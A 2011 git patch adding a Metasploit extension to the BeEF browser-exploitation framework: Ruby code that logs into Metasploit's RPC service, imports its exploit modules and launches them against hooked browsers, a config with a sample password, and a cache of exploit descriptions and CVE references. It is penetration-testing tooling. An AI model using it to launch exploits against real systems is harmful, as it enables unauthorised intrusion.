From a2acadb4eb9536c19a482c5f1211707b9bacd07a Mon Sep 17 00:00:00 2001 From: passbe Date: Sat, 3 Sep 2011 00:44:26 +0000 Subject: [PATCH] Added new metasploit extension. Needs more work but the majority of the extension is there git-svn-id: https://beef.googlecode.com/svn/trunk@1259 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- extensions/metasploit/api.rb | 128 + extensions/metasploit/config.yaml | 33 + extensions/metasploit/extension.rb | 85 + extensions/metasploit/module.rb | 20 + extensions/metasploit/msf-exploits.cache | 16119 +++++++++++++++++++++ extensions/metasploit/rpcclient.rb | 209 + 6 files changed, 16594 insertions(+) create mode 100644 extensions/metasploit/api.rb create mode 100644 extensions/metasploit/config.yaml create mode 100644 extensions/metasploit/extension.rb create mode 100644 extensions/metasploit/module.rb create mode 100644 extensions/metasploit/msf-exploits.cache create mode 100644 extensions/metasploit/rpcclient.rb diff --git a/extensions/metasploit/api.rb b/extensions/metasploit/api.rb new file mode 100644 index 000000000..56bdab2a1 --- /dev/null +++ b/extensions/metasploit/api.rb @@ -0,0 +1,128 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF +module Extension +module Metasploit +module API + + module MetasploitHooks + + BeEF::API::Registra.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load') + + # Load modules from metasploit just after all other module config is loaded + def self.post_soft_load + msf = BeEF::Extension::Metasploit::RpcClient.instance + if msf.login + msf_module_config = {} + path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path') + if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache") + print_debug "Attempting to use Metasploit exploits cache file" + raw = File.read("#{path}msf-exploits.cache") + begin + msf_module_config = YAML.load(raw) + rescue => e + puts e + end + count = 1 + msf_module_config.each{|k,v| + BeEF::API::Registra.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k]) + BeEF::API::Registra.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil]) + print_over "Loaded #{count} Metasploit exploits." + count += 1 + } + print "\r\n" + else + msf_modules = msf.call('module.exploits') + count = 1 + msf_modules['modules'].each{|m| + m_details = msf.call('module.info', 'exploits', m) + if m_details + key = 'msf_'+m.split('/').last + # system currently doesn't support multilevel categories + #categories = ['Metasploit'] + #m.split('/')[0...-1].each{|c| + # categories.push(c.capitalize) + #} + msf_module_config[key] = { + 'enable'=> true, + 'msf'=> true, + 'msf_key' => m, + 'name'=> m_details['name'], + 'category' => 'Metasploit', + 'description'=> m_details['description'], + 'authors'=> m_details['references'], + 'path'=> path, + 'class'=> 'Msf_module' + } + BeEF::API::Registra.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key]) + BeEF::API::Registra.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil]) + print_over "Loaded #{count} Metasploit exploits." + count += 1 + end + } + print "\r\n" + File.open("#{path}msf-exploits.cache", "w") do |f| + f.write(msf_module_config.to_yaml) + print_debug "Wrote Metasploit exploits to cache file" + end + end + BeEF::Core::Configuration.instance.set('beef.module', msf_module_config) + end + end + + # Get module options + payloads when the beef framework requests this information + def self.get_options(mod) + msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key") + msf = BeEF::Extension::Metasploit::RpcClient.instance + if msf_key != nil and msf.login + msf_module_options = msf.call('module.options', 'exploit', msf_key) + if msf_module_options + options = BeEF::Extension::Metasploit.translate_options(msf_module_options) + msf_payload_options = msf.call('module.compatible_payloads', msf_key) + if msf_payload_options + options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options) + return options + else + print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}" + end + else + print_error "Unable to retrieve metasploit options for exploit: #{msf_key}" + end + end + end + + # Execute function for all metasploit exploits + def self.override_execute(mod, opts) + msf = BeEF::Extension::Metasploit::RpcClient.instance + msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key") + if msf_key != nil and msf.login + # Are the options correctly formatted for msf? + # This call has not been tested + msf.call('module.execute', 'exploit', msf_key, opts) + end + # Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of + # which exploits where executed against which hooked browsers + return true + end + + end + + + +end +end +end +end diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml new file mode 100644 index 000000000..e246c8e36 --- /dev/null +++ b/extensions/metasploit/config.yaml @@ -0,0 +1,33 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# Enable MSF by changing extension:metasploit:enable to true +# Then set msf_callback_host to be the public IP of your MSF server +# +# Ensure you load the xmlrpc interface in Metasploit +# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web +# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below. +beef: + extension: + metasploit: + name: 'Metasploit' + enable: true + host: "127.0.0.1" + url-path: "/RPC2" + port: 55553 + user: "msf" + pass: "abc123" + callback_host: "192.168.84.1" + autopwn_url: "autopwn" diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb new file mode 100644 index 000000000..baeb76e48 --- /dev/null +++ b/extensions/metasploit/extension.rb @@ -0,0 +1,85 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF +module Extension +module Metasploit + + extend BeEF::API::Extension + + # Translates msf exploit options to beef options array + def self.translate_options(msf_options) + options = [] + msf_options.each{|k,v| + case v['type'] + when "string", "address", "port", "integer" + v['type'] = 'text' + when "bool" + v['type'] = 'checkbox' + when "enum" + v['type'] = 'combobox' + v['store_type'] = 'arraystore', + v['store_fields'] = ['enum'], + v['store_data'] = self.translate_enums(v['enums']), + v['valueField'] = 'enum', + v['displayField'] = 'enum', + v['autoWidth'] = true, + v['mode'] = 'local' + end + v['name'] = k + v['label'] = k + options << v + } + return options + end + + # Translates msf payloads to a beef compatible drop down + def self.translate_payload(payloads) + if payloads.has_key?('payloads') + values = self.translate_enums(payloads['payloads']) + if values.length > 0 + return { + 'name' => 'payload', + 'type' => 'combobox', + 'ui_label' => 'Payload', + 'store_type' => 'arraystore', + 'store_fields' => ['payload'], + 'store_data' => values, + 'valueField' => 'payload', + 'displayField' => 'payload', + 'mode' => 'local', + 'autoWidth' => true + } + end + end + return nil + end + + # Translates metasploit enums to ExtJS combobox store_data + def self.translate_enums(enums) + values = [] + enums.each{|e| + values << [e] + } + return values + end + + +end +end +end + +require 'extensions/metasploit/rpcclient' +require 'extensions/metasploit/api' diff --git a/extensions/metasploit/module.rb b/extensions/metasploit/module.rb new file mode 100644 index 000000000..1fa29fd40 --- /dev/null +++ b/extensions/metasploit/module.rb @@ -0,0 +1,20 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +# This is a dummy module to fool BeEF's loading system +class Msf_module < BeEF::Core::Command + +end diff --git a/extensions/metasploit/msf-exploits.cache b/extensions/metasploit/msf-exploits.cache new file mode 100644 index 000000000..a910a814e --- /dev/null +++ b/extensions/metasploit/msf-exploits.cache @@ -0,0 +1,16119 @@ +--- +msf_rpc_cmsd_opcode21: + enable: true + msf: true + msf_key: aix/rpc_cmsd_opcode21 + name: AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow vulnerability in opcode 21 handled by\n\ + \t\t\t\trpc.cmsd on AIX. By making a request with a long string passed to the first\n\ + \t\t\t\targument of the \"rtable_create\" RPC, a stack based buffer overflow occurs. This\n\ + \t\t\t\tleads to arbitrary code execution.\n\n\ + \t\t\t\tNOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where\n\ + \t\t\t\tfurther attempts are not possible.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3699 + - - OSVDB + - "58726" + - - BID + - "36615" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825 + - - URL + - http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc + path: extensions/metasploit/ + class: Msf_module +msf_rpc_ttdbserverd_realpath: + enable: true + msf: true + msf_key: aix/rpc_ttdbserverd_realpath + name: ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow vulnerability in _tt_internal_realpath\n\ + \t\t\t\tfunction of the ToolTalk database server (rpc.ttdbserverd).\n\ + \t\t\t" + authors: + - - CVE + - 2009-2727 + - - OSVDB + - "55151" + path: extensions/metasploit/ + class: Msf_module +msf_tagprinter_exec: + enable: true + msf: true + msf_key: irix/lpd/tagprinter_exec + name: Irix LPD tagprinter Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\ + \t\t\t\tthe in.lpd service shipped with all versions of Irix.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0800 + - - OSVDB + - "8573" + - - URL + - http://www.lsd-pl.net/code/IRIX/irx_lpsched.c + path: extensions/metasploit/ + class: Msf_module +msf_lsass_cifs: + enable: true + msf: true + msf_key: netware/smb/lsass_cifs + name: Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.\n\ + \t\t\t\tSince the driver runs in the kernel space, a failed exploit attempt can\n\ + \t\t\t\tcause the OS to reboot.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2852 + - - OSVDB + - "12790" + path: extensions/metasploit/ + class: Msf_module +msf_pkernel_callit: + enable: true + msf: true + msf_key: netware/sunrpc/pkernel_callit + name: NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.\n\ + \t\t\t\tPKERNEL.NLM is installed by default on all NetWare servers to support NFS.\n\ + \t\t\t\tThe PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can\n\ + \t\t\t\tcause the operating system to reboot.\n\ + \t\t\t" + authors: + - - BID + - "36564" + - - OSVDB + - "58447" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-067/ + path: extensions/metasploit/ + class: Msf_module +msf_clamav_milter_blackhole: + enable: true + msf: true + msf_key: unix/smtp/clamav_milter_blackhole + name: ClamAV Milter Blackhole-Mode Remote Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n\ + \t\t\t\t(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n\ + \t\t\t\tWhen implemented with black hole mode enabled, it is possible to execute\n\ + \t\t\t\tcommands remotely due to an insecure popen call.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4560 + - - OSVDB + - "36909" + - - BID + - "25439" + - - URL + - http://www.milw0rm.com/exploits/4761 + path: extensions/metasploit/ + class: Msf_module +msf_exim4_string_format: + enable: true + msf: true + msf_key: unix/smtp/exim4_string_format + name: Exim4 <= 4.69 string_format Function Heap Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap buffer overflow within versions of Exim prior to\n\ + \t\t\t\tversion 4.69. By sending a specially crafted message, an attacker can corrupt the\n\ + \t\t\t\theap and execute arbitrary code with the privileges of the Exim daemon.\n\n\ + \t\t\t\tThe root cause is that no check is made to ensure that the buffer is not full\n\ + \t\t\t\tprior to handling '%s' format specifiers within the 'string_vformat' function.\n\ + \t\t\t\tIn order to trigger this issue, we get our message rejected by sending a message\n\ + \t\t\t\tthat is too large. This will call into log_write to log rejection headers (which\n\ + \t\t\t\tis a default configuration setting). After filling the buffer, a long header\n\ + \t\t\t\tstring is sent. In a successful attempt, it overwrites the ACL for the 'MAIL\n\ + \t\t\t\tFROM' command. By sending a second message, the string we sent will be evaluated\n\ + \t\t\t\twith 'expand_string' and arbitrary shell commands can be executed.\n\n\ + \t\t\t\tIt is likely that this issue could also be exploited using other techniques such\n\ + \t\t\t\tas targeting in-band heap management structures, or perhaps even function pointers\n\ + \t\t\t\tstored in the heap. However, these techniques would likely be far more platform\n\ + \t\t\t\tspecific, more complicated, and less reliable.\n\n\ + \t\t\t\tThis bug was original found and reported in December 2008, but was not\n\ + \t\t\t\tproperly handled as a security issue. Therefore, there was a 2 year lag time\n\ + \t\t\t\tbetween when the issue was fixed and when it was discovered being exploited\n\ + \t\t\t\tin the wild. At that point, the issue was assigned a CVE and began being\n\ + \t\t\t\taddressed by downstream vendors.\n\n\ + \t\t\t\tAn additional vulnerability, CVE-2010-4345, was also used in the attack that\n\ + \t\t\t\tled to the discovery of danger of this bug. This bug allows a local user to\n\ + \t\t\t\tgain root privileges from the Exim user account. If the Perl interpreter is\n\ + \t\t\t\tfound on the remote system, this module will automatically exploit the\n\ + \t\t\t\tsecondary bug as well to get root.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4344 + - - OSVDB + - "69685" + - - BID + - "45308" + - - CVE + - 2010-4345 + - - BID + - "45341" + - - URL + - http://seclists.org/oss-sec/2010/q4/311 + - - URL + - http://www.gossamer-threads.com/lists/exim/dev/89477 + - - URL + - http://bugs.exim.org/show_bug.cgi?id=787 + - - URL + - http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b + path: extensions/metasploit/ + class: Msf_module +msf_spamassassin_exec: + enable: true + msf: true + msf_key: unix/misc/spamassassin_exec + name: SpamAssassin spamd Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the SpamAssassin spamd service by specifying\n\ + \t\t\t\ta malicious vpopmail User header, when running with vpopmail and paranoid\n\ + \t\t\t\tmodes enabled (non-default). Versions prior to v3.1.3 are vulnerable\n\ + \t\t\t" + authors: + - - CVE + - 2006-2447 + - - OSVDB + - "26177" + - - BID + - "18290" + - - URL + - http://spamassassin.apache.org/advisories/cve-2006-2447.txt + path: extensions/metasploit/ + class: Msf_module +msf_zabbix_agent_exec: + enable: true + msf: true + msf_key: unix/misc/zabbix_agent_exec + name: Zabbix Agent net.tcp.listen Command Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a metacharacter injection vulnerability\n\ + \t\t\t\tin the FreeBSD and Solaris versions of the Zabbix agent. This flaw\n\ + \t\t\t\tcan only be exploited if the attacker can hijack the IP address\n\ + \t\t\t\tof an authorized server (as defined in the configuration file).\n\ + \t\t\t" + authors: + - - CVE + - 2009-4502 + - - OSVDB + - "60956" + - - URL + - https://support.zabbix.com/browse/ZBX-1032 + path: extensions/metasploit/ + class: Msf_module +msf_distcc_exec: + enable: true + msf: true + msf_key: unix/misc/distcc_exec + name: DistCC Daemon Command Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module uses a documented security weakness to execute\n\ + \t\t\t\tarbitrary commands on any system running distccd.\n\n\ + \t\t\t" + authors: + - - CVE + - 2004-2687 + - - OSVDB + - "13378" + - - URL + - http://distcc.samba.org/security.html + path: extensions/metasploit/ + class: Msf_module +msf_vsftpd_234_backdoor: + enable: true + msf: true + msf_key: unix/ftp/vsftpd_234_backdoor + name: VSFTPD v2.3.4 Backdoor Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a malicious backdoor that was added to the\tVSFTPD download\n\ + \t\t\t\t\tarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between\n\ + \t\t\t\t\tJune 30th 2011 and July 1st 2011 according to the most recent information\n\ + \t\t\t\t\tavailable. This backdoor was removed on July 3rd 2011.\n\ + \t\t\t" + authors: + - - OSVDB + - "73573" + - - URL + - http://pastebin.com/AetT9sS5 + - - URL + - http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html + path: extensions/metasploit/ + class: Msf_module +msf_proftpd_133c_backdoor: + enable: true + msf: true + msf_key: unix/ftp/proftpd_133c_backdoor + name: ProFTPD-1.3.3c Backdoor Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\ + \t\t\t\tProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n\ + \t\t\t\tarchive between November 28th 2010 and 2nd December 2010.\n\ + \t\t\t" + authors: + - - OSVDB + - "69562" + - - BID + - "45150" + - - URL + - http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org + path: extensions/metasploit/ + class: Msf_module +msf_contentkeeperweb_mimencode: + enable: true + msf: true + msf_key: unix/http/contentkeeperweb_mimencode + name: ContentKeeper Web Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the ContentKeeper Web Appliance. Versions prior\n\ + \t\t\t\tto 125.10 are affected. This module exploits a combination of weaknesses\n\ + \t\t\t\tto enable remote command execution as the Apache user. By setting\n\ + \t\t\t\tSkipEscalation to false, this module will attempt to setuid the bash shell.\n\ + \t\t\t" + authors: + - - OSVDB + - "54551" + - - OSVDB + - "54552" + - - URL + - http://www.aushack.com/200904-contentkeeper.txt + path: extensions/metasploit/ + class: Msf_module +msf_unreal_ircd_3281_backdoor: + enable: true + msf: true + msf_key: unix/irc/unreal_ircd_3281_backdoor + name: UnrealIRCD 3.2.8.1 Backdoor Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\ + \t\t\t\tUnreal IRCD 3.2.8.1 download archive. This backdoor was present in the\n\ + \t\t\t\tUnreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2075 + - - OSVDB + - "65445" + - - URL + - http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt + path: extensions/metasploit/ + class: Msf_module +msf_awstatstotals_multisort: + enable: true + msf: true + msf_key: unix/webapp/awstatstotals_multisort + name: AWStats Totals =< v1.14 multisort Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\t\tAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n\ + \t\t\t" + authors: + - - CVE + - 2008-3922 + - - OSVDB + - "47807" + - - BID + - "30856" + - - URL + - http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt + path: extensions/metasploit/ + class: Msf_module +msf_coppermine_piceditor: + enable: true + msf: true + msf_key: unix/webapp/coppermine_piceditor + name: Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the picEditor.php script of Coppermine\n\ + \t\t\t\tPhoto Gallery. When configured to use the ImageMagick library, the 'quality', 'angle',\n\ + \t\t\t\tand 'clipval' parameters are not properly escaped before being passed to the PHP\n\ + \t\t\t\t'exec' command.\n\n\ + \t\t\t\tIn order to reach the vulnerable 'exec' call, the input must pass several validation\n\ + \t\t\t\tsteps.\n\n\ + \t\t\t\tThe vulnerabilities actually reside in the following functions:\n\n\ + \t\t\t\timage_processor.php: rotate_image(...)\n\ + \t\t\t\tinclude/imageObjectIM.class.php: imageObject::cropImage(...)\n\ + \t\t\t\tinclude/imageObjectIM.class.php: imageObject::rotateImage(...)\n\ + \t\t\t\tinclude/imageObjectIM.class.php: imageObject::resizeImage(...)\n\ + \t\t\t\tinclude/picmgmt.inc.php: resize_image(...)\n\n\ + \t\t\t\tNOTE: Use of the ImageMagick library is a non-default option. However, a user can\n\ + \t\t\t\tspecify its use at installation time.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0506 + - - OSVDB + - "41676" + - - URL + - http://www.exploit-db.com/exploits/5019 + - - URL + - http://forum.coppermine-gallery.net/index.php?topic=50103.0 + path: extensions/metasploit/ + class: Msf_module +msf_php_vbulletin_template: + enable: true + msf: true + msf_key: unix/webapp/php_vbulletin_template + name: vBulletin misc.php Template Name Arbitrary Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in\n\ + \t\t\t\tthe vBulletin web forum software. This vulnerability is only\n\ + \t\t\t\tpresent when the \"Add Template Name in HTML Comments\" option\n\ + \t\t\t\tis enabled. All versions of vBulletin prior to 3.0.7 are\n\ + \t\t\t\taffected.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0511 + - - BID + - "12622" + - - OSVDB + - "14047" + path: extensions/metasploit/ + class: Msf_module +msf_sphpblog_file_upload: + enable: true + msf: true + msf_key: unix/webapp/sphpblog_file_upload + name: Simple PHP Blog <= 0.4.0 Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n\ + \t\t\t\tapplication to upload arbitrary data and thus execute a shell. The first\n\ + \t\t\t\tvulnerability exposes the hash file (password.txt) to unauthenticated users.\n\ + \t\t\t\tThe second vulnerability lies within the image upload system provided to\n\ + \t\t\t\tlogged-in users; there is no image validation function in the blogger to\n\ + \t\t\t\tprevent an authenticated user from uploading any file type. The third\n\ + \t\t\t\tvulnerability occurs within the blog comment functionality, allowing\n\ + \t\t\t\tarbitrary files to be deleted.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2733 + - - OSVDB + - "19012" + - - BID + - "14667" + - - URL + - http://www.milw0rm.com/exploits/1191 + path: extensions/metasploit/ + class: Msf_module +msf_awstats_migrate_exec: + enable: true + msf: true + msf_key: unix/webapp/awstats_migrate_exec + name: AWStats migrate Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\tAWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based\n\ + \t\t\t\tpayloads are recommended with this module. The vulnerability is only\n\ + \t\t\t\tpresent when AllowToUpdateStatsFromBrowser is enabled in the AWstats\n\ + \t\t\t\tconfiguration file (non-default).\n\ + \t\t\t" + authors: + - - CVE + - 2006-2237 + - - OSVDB + - "25284" + - - BID + - "17844" + - - URL + - http://awstats.sourceforge.net/awstats_security_news.php + - - URL + - http://www.milw0rm.com/exploits/1755 + path: extensions/metasploit/ + class: Msf_module +msf_oscommerce_filemanager: + enable: true + msf: true + msf_key: unix/webapp/oscommerce_filemanager + name: osCommerce 2.2 Arbitrary PHP Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tosCommerce is a popular open source E-Commerce application.\n\ + \t\t\t\tThe admin console contains a file management utility that\n\ + \t\t\t\tallows administrators to upload, download, and edit files.\n\ + \t\t\t\tThis could be abused to allow unauthenticated attackers to\n\ + \t\t\t\texecute arbitrary code with the permissions of the\n\ + \t\t\t\twebserver.\n\ + \t\t\t" + authors: + - - OSVDB + - "60018" + - - URL + - http://www.milw0rm.com/exploits/9556 + path: extensions/metasploit/ + class: Msf_module +msf_php_eval: + enable: true + msf: true + msf_key: unix/webapp/php_eval + name: Generic PHP Code eval + category: Metasploit + description: "\n\ + \t\t\t\tExploits things like \n\ + \t\t\t\tIt is likely that HTTP evasion options will break this exploit.\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_squirrelmail_pgp_plugin: + enable: true + msf: true + msf_key: unix/webapp/squirrelmail_pgp_plugin + name: SquirrelMail PGP Plugin command execution (SMTP) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command execution vulnerability in the\n\ + \t\t\t\tPGP plugin of SquirrelMail. This flaw was found while quickly\n\ + \t\t\t\tgrepping the code after release of some information at\n\ + \t\t\t\thttp://www.wslabi.com/. Later, iDefense published an advisory ....\n\n\ + \t\t\t\tReading an email in SquirrelMail with the PGP plugin activated\n\ + \t\t\t\tis enough to compromise the underlying server.\n\n\ + \t\t\t\tOnly \"cmd/unix/generic\" payloads were tested.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0990 + - - OSVDB + - "3178" + - - URL + - http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330 + - - URL + - http://www.wslabi.com/wabisabilabi/initPublishedBid.do? + path: extensions/metasploit/ + class: Msf_module +msf_twiki_history: + enable: true + msf: true + msf_key: unix/webapp/twiki_history + name: TWiki History TWikiUsers rev Parameter Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the history component of TWiki.\n\ + \t\t\t\tBy passing a 'rev' parameter containing shell metacharacters to the TWikiUsers\n\ + \t\t\t\tscript, an attacker can execute arbitrary OS commands.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2877 + - - OSVDB + - "19403" + - - BID + - "14834" + - - URL + - http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev + path: extensions/metasploit/ + class: Msf_module +msf_dogfood_spell_exec: + enable: true + msf: true + msf_key: unix/webapp/dogfood_spell_exec + name: Dogfood CRM spell.php Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a previously unpublished vulnerability in the\n\ + \t\t\t\tDogfood CRM mail function which is vulnerable to command injection\n\ + \t\t\t\tin the spell check feature. Because of character restrictions, this\n\ + \t\t\t\texploit works best with the double-reverse telnet payload. This\n\ + \t\t\t\tvulnerability was discovered by LSO and affects v2.0.10.\n\ + \t\t\t" + authors: + - - OSVDB + - "54707" + - - URL + - http://downloads.sourceforge.net/dogfood/ + path: extensions/metasploit/ + class: Msf_module +msf_openx_banner_edit: + enable: true + msf: true + msf_key: unix/webapp/openx_banner_edit + name: OpenX banner-edit.php File Upload PHP Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the OpenX advertising software.\n\ + \t\t\t\tIn versions prior to version 2.8.2, authenticated users can upload files\n\ + \t\t\t\twith arbitrary extensions to be used as banner creative content. By uploading\n\ + \t\t\t\ta file with a PHP extension, an attacker can execute arbitrary PHP code.\n\n\ + \t\t\t\tNOTE: The file must also return either \"png\", \"gif\", or \"jpeg\" as its image\n\ + \t\t\t\ttype as returned from the PHP getimagesize() function.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4098 + - - OSVDB + - "60499" + - - BID + - "37110" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html + - - URL + - https://developer.openx.org/jira/browse/OX-5747 + - - URL + - http://www.openx.org/docs/2.8/release-notes/openx-2.8.2 + - - URL + - http://php.net/manual/en/function.getimagesize.php + - - URL + - http://gynvael.coldwind.pl/?id=223 + - - URL + - http://gynvael.coldwind.pl/?id=224 + - - URL + - http://gynvael.coldwind.pl/?id=235 + - - URL + - http://programming.arantius.com/the+smallest+possible+gif + - - URL + - http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes + path: extensions/metasploit/ + class: Msf_module +msf_tikiwiki_jhot_exec: + enable: true + msf: true + msf_key: unix/webapp/tikiwiki_jhot_exec + name: TikiWiki jhot Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tTikiWiki contains a flaw that may allow a malicious user to execute\n\ + \t\t\t\tarbitrary PHP code. The issue is triggered due to the jhot.php script\n\ + \t\t\t\tnot correctly verifying uploaded files. It is possible that the flaw\n\ + \t\t\t\tmay allow arbitrary PHP code execution by uploading a malicious PHP\n\ + \t\t\t\tscript resulting in a loss of integrity.\n\n\ + \t\t\t\tThe vulnerability was reported in Tikiwiki version 1.9.4.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4602 + - - OSVDB + - "28456" + - - BID + - "19819" + - - URL + - http://secunia.com/advisories/21733/ + path: extensions/metasploit/ + class: Msf_module +msf_qtss_parse_xml_exec: + enable: true + msf: true + msf_key: unix/webapp/qtss_parse_xml_exec + name: QuickTime Streaming Server parse_xml.cgi Remote Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThe QuickTime Streaming Server contains a CGI script that is vulnerable\n\ + \t\t\t\tto metacharacter injection, allow arbitrary commands to be executed as root.\n\ + \t\t\t\t" + authors: + - - OSVDB + - "10562" + - - BID + - "6954" + - - CVE + - 2003-0050 + path: extensions/metasploit/ + class: Msf_module 